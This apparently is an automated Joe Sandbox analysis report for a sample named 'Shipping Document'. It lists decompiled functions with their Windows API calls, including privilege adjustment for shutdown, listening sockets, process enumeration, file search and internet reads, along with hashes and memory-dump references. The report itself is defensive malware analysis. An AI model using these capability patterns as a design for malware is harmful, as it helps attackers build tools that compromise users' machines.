Opcode Fuzzy Hash: e809285fdd4d1f4d859d581d2092fc540d561f50c790a3872bbc04e4bee407c0
Instruction Fuzzy Hash: F851633180125E9ACF15FBA4CE93EEDB7B9AF18300F6441A9E58177091DF296F09DB60

Function 0102F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0102F6AB
Sleep.KERNEL32(0000000A), ref: 0102F6DB
_wcscmp.LIBCMT ref: 0102F6EF
_wcscmp.LIBCMT ref: 0102F70A
FindNextFileW.KERNEL32(?,?), ref: 0102F7A8
FindClose.KERNEL32(00000000), ref: 0102F7BE

Strings

*.*, xrefs: 0102F690

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: b96f26b71a3398369e53755199956d194531c205281088f395129195008c141f
Instruction ID: b4511ec4f0967d16eae9e63b47c205abb70f5c38c89cfd50c0269488e35bf9cb
Opcode Fuzzy Hash: b96f26b71a3398369e53755199956d194531c205281088f395129195008c141f
Instruction Fuzzy Hash: 6F41AF7190021B9FDF61EF68CD89EEEBBB4FF05350F14459AE894A3190DB359A44CB90

Function 00FD4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00FD44DB
VUUU, xrefs: 00FD4520
VUUU, xrefs: 00FD44ED
ERCP, xrefs: 00FD421F
VUUU, xrefs: 01007B0C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: ce4d4ba344302b3f548ed25106c882fd932786b3949d59985f5d90bcc83d188c
Instruction ID: 6d0aed1e80f38552843c95dba0625cc776b3b4847f380836ce0cdb9abde9d2ca
Opcode Fuzzy Hash: ce4d4ba344302b3f548ed25106c882fd932786b3949d59985f5d90bcc83d188c
Instruction Fuzzy Hash: C5A27371D0021ACBEF25CF58C9907ADB7B2BF44314F1881AAD996A7380D734AD81EF51

Function 00FD58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD5A05
_memmove.LIBCMT ref: 00FD5A55
_memmove.LIBCMT ref: 00FD5ABB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a9265c65853ab2fb1cb22602cc2af06469a5fac96296562c48fb18bb156759fe
Instruction ID: d3cf0c596feb3439809623000febf15a9dc83b4fa80f432ab40f158443feb1d4
Opcode Fuzzy Hash: a9265c65853ab2fb1cb22602cc2af06469a5fac96296562c48fb18bb156759fe
Instruction Fuzzy Hash: 8A12DE70A0060ADFDF14DFA5C981AEEB7F6FF48300F14412AE486A7255EB3AAD51DB50

Function 0102545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 01018CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
Part of subcall function 01018CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
Part of subcall function 01018CC3: GetLastError.KERNEL32 ref: 01018D47

ExitWindowsEx.USER32(?,00000000), ref: 0102549B

Strings

, xrefs: 01025489
@, xrefs: 0102548E
SeShutdownPrivilege, xrefs: 0102546B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 609d7be520e32b907b5bc78627caeb05ccfc0700cdefe409fb7f77605f2dfcf1
Instruction ID: 418a9fd985b55aabd1ad42c4fb03464bd9f1e1d9ad76c31af52627156763ea5b
Opcode Fuzzy Hash: 609d7be520e32b907b5bc78627caeb05ccfc0700cdefe409fb7f77605f2dfcf1
Instruction Fuzzy Hash: 53014C71B562325BF778567CDC4ABFAF2A8EB0425BF140061FDC6D60C2DE954C004298

Function 01036596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 010365EF
WSAGetLastError.WSOCK32(00000000), ref: 010365FE
bind.WSOCK32(00000000,?,00000010), ref: 0103661A
listen.WSOCK32(00000000,00000005), ref: 01036629
WSAGetLastError.WSOCK32(00000000), ref: 01036643
closesocket.WSOCK32(00000000), ref: 01036657

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: af4e7968fa7737151c244c702d1442d8703d87b9c0b8002882b3898e6d7b186a
Instruction ID: 11e8c4d10e74779b4ffe6241e5017376a03e0c6286f5b1154717eb0dbabc26f0
Opcode Fuzzy Hash: af4e7968fa7737151c244c702d1442d8703d87b9c0b8002882b3898e6d7b186a
Instruction Fuzzy Hash: 4F21C375200211AFDB10EF68C989F6EB7E9EF89310F118159E996E72C1CB79AD00DB51

Function 00FD5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041

_memmove.LIBCMT ref: 0101062F
_memmove.LIBCMT ref: 01010744
_memmove.LIBCMT ref: 010107EB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 43521217e45e490ad97e873989c8d4ff83c4e14a272aa0a633083ad641259134
Instruction ID: 818234a8f8e011390c694e351e11cbed824b95407c721fa405e3feb0e965a6b5
Opcode Fuzzy Hash: 43521217e45e490ad97e873989c8d4ff83c4e14a272aa0a633083ad641259134
Instruction Fuzzy Hash: D002AF70E00209DBDF04DF65D981AAEBBB5FF44300F1480A9F886DB259EB39DA51DB91

Function 00FC1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00FC19FA
GetSysColor.USER32(0000000F), ref: 00FC1A4E
SetBkColor.GDI32(?,00000000), ref: 00FC1A61

Part of subcall function 00FC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FC12D8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: e06de5c28f90fe10f5a008b3aa09b0fb121bda40bc8f05f05b6e044d7432903d
Instruction ID: 60dcac6c8343017f4a808803fcbbcebfbd4de1c7e473f93980601c454f91dc40
Opcode Fuzzy Hash: e06de5c28f90fe10f5a008b3aa09b0fb121bda40bc8f05f05b6e044d7432903d
Instruction Fuzzy Hash: 74A13BB250644BBAE734AA298E86FBF355CFF83361B14011DF542D5197CA2DCC21B2B1

Function 01036A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 010380A0: inet_addr.WSOCK32(00000000), ref: 010380CB

socket.WSOCK32(00000002,00000002,00000011), ref: 01036AB1
WSAGetLastError.WSOCK32(00000000), ref: 01036ADA
bind.WSOCK32(00000000,?,00000010), ref: 01036B13
WSAGetLastError.WSOCK32(00000000), ref: 01036B20
closesocket.WSOCK32(00000000), ref: 01036B34

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5ea990b164cf006b5a803eb20f9651491d1da73bd9b919cdbfe05e383be22c97
Instruction ID: 5e3f3a81d71d31ed16d5df46e5d03533cfb8702d53b15bf5cadbdb36ed159ef6
Opcode Fuzzy Hash: 5ea990b164cf006b5a803eb20f9651491d1da73bd9b919cdbfe05e383be22c97
Instruction Fuzzy Hash: C341D475700611AFEB10AF68DD87F6E77E8DB44B10F04805CF95AAB3C2CAB99D019B91

Function 010455FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0104564C
IsWindowEnabled.USER32 ref: 0104565A
GetForegroundWindow.USER32(?,?,00000001), ref: 01045667
IsIconic.USER32 ref: 01045675
IsZoomed.USER32 ref: 01045683

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0c6ba2f2ff1c0ef33c991350af335a0866f2c2090dcab3a4529017aba78642f0
Instruction ID: cdecad418fbc24b8134fb1da9768c0e65accc14b1443b0cf249b530e14c1acbe
Opcode Fuzzy Hash: 0c6ba2f2ff1c0ef33c991350af335a0866f2c2090dcab3a4529017aba78642f0
Instruction Fuzzy Hash: C011C4B53005126FE7216F2AED85B2F7BD8EF48721F004079F986D7241CB799901CAA4

Function 0102C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0102C69D
CoCreateInstance.OLE32(01052D6C,00000000,00000001,01052BDC,?), ref: 0102C6B5

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

CoUninitialize.OLE32 ref: 0102C922

Strings

.lnk, xrefs: 0102C631, 0102C659, 0102C663

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5b7b8ec9b1fd3fa00e24f41ca6f459f69271d40191baae30a5cbf1adf9cf892b
Instruction ID: a37d6b5d580fcba3039c69bc45ac0d9789697d2e82e10a154eac293cd047ce23
Opcode Fuzzy Hash: 5b7b8ec9b1fd3fa00e24f41ca6f459f69271d40191baae30a5cbf1adf9cf892b
Instruction Fuzzy Hash: 07A12B71108206AFD300EF64CD86EABB7ECEF94704F00495CF1969B191DBB5EA49DB92

Function 0103C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,01001D88,?), ref: 0103C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0103C324

Strings

GetSystemWow64DirectoryW, xrefs: 0103C31E
kernel32.dll, xrefs: 0103C30D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: b7bfd4939f32a719189c1fd0dfd7bdd004432492a437b920ad822114fe921d5c
Instruction ID: 40edbbd27e4d94a04ec065bce403fa941952ea2782a458e9590f97154eca3de8
Opcode Fuzzy Hash: b7bfd4939f32a719189c1fd0dfd7bdd004432492a437b920ad822114fe921d5c
Instruction Fuzzy Hash: 97E0C2F8600303CFEB314F2EC654A5676D8EF49244B80C86EE8C5E6220E774D440CBA0

Function 00FD3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: cf67c576df59a26a14e30c380d0ba19e3af26447315f2169b354535c4bbd412f
Instruction ID: a01408d7bc764e4b2ab223ee1cb3882b98f1bbee04edb1f2963b09d7db0a1c04
Opcode Fuzzy Hash: cf67c576df59a26a14e30c380d0ba19e3af26447315f2169b354535c4bbd412f
Instruction Fuzzy Hash: 9622AC715083029FD725DF28C881B6EB7E5AF84710F08491EF6CA97391DB79EA04DB92

Function 0103F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0103F151
Process32FirstW.KERNEL32(00000000,?), ref: 0103F15F

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Process32NextW.KERNEL32(00000000,?), ref: 0103F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0103F22E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 16d31f0e3117a9a76ca501ab0d0f5f437b215ccfe91edfbb3dfe0851dce34373
Instruction ID: 6adf5865106df99ed537fce1726483b9c8b64f0b2a5ebf21400516673e7fb9bd
Opcode Fuzzy Hash: 16d31f0e3117a9a76ca501ab0d0f5f437b215ccfe91edfbb3dfe0851dce34373
Instruction Fuzzy Hash: 6C517C71508302AFD320EF24DD86F6BBBE8AF94B10F10481DF59597291EB74A908DB92

Function 0101EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0101EB19

Strings

|, xrefs: 0101EB49
(, xrefs: 0101EB5F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d4d0a0a4903439eb9c5e4943c85c0a198a2741866e6e822359d99e97087615c6
Instruction ID: b26db33889195eb5d1dfa31da0068ffb512770c78ad7bd6ef41c26896c46a2bd
Opcode Fuzzy Hash: d4d0a0a4903439eb9c5e4943c85c0a198a2741866e6e822359d99e97087615c6
Instruction Fuzzy Hash: D8323775A007059FDB29CF19C480A6AB7F1FF48320B15C5AEE99ADB3A5D770E981CB40

Function 010325E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 010326D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0103270C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: fb8842f0fea9fdf3bc1302c59e5a835ead8a60d3d6386d7c7eb6f918b6cac10d
Instruction ID: c8a82743eda69aaa03e3586e052f85ac36674788dffb5c9dbd68fb0ef6c998cb
Opcode Fuzzy Hash: fb8842f0fea9fdf3bc1302c59e5a835ead8a60d3d6386d7c7eb6f918b6cac10d
Instruction Fuzzy Hash: 0741F375900209BFEB21DA59DD84EBFB7FCFF84724F0040AAF681A6140EB759E41A650

Function 0102B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0102B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0102B655

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 61fc4eb641d221a986bc50570dc1fdef5a9951ffc4c17543d8cf2a05472f20e6
Instruction ID: a27a5ea0a3137b503f3548f7ed8cbebe455fd9510af48fa5b3891837dc1c83b0
Opcode Fuzzy Hash: 61fc4eb641d221a986bc50570dc1fdef5a9951ffc4c17543d8cf2a05472f20e6
Instruction Fuzzy Hash: 30219D75A00519EFCB00EFA5D984EEEBBB8FF48310F0480A9E945AB351CB35A905CF50

Function 01018CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
GetLastError.KERNEL32 ref: 01018D47

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: daf836e9b9ecb50e0fc6e69e895c78294e2d2b6f5b6f3d9210b30b948542b792
Instruction ID: 97f06949b3006621c2cd7708e033babfa29bb43e7a8add5e6fbff29093e3c3dc
Opcode Fuzzy Hash: daf836e9b9ecb50e0fc6e69e895c78294e2d2b6f5b6f3d9210b30b948542b792
Instruction Fuzzy Hash: 5311BFB1414309AFE328AF58DC85D6BB7F9FB44710B10C52EF89683205EB74A9408B60

Function 01024021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0102404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 01024088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 01024091

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

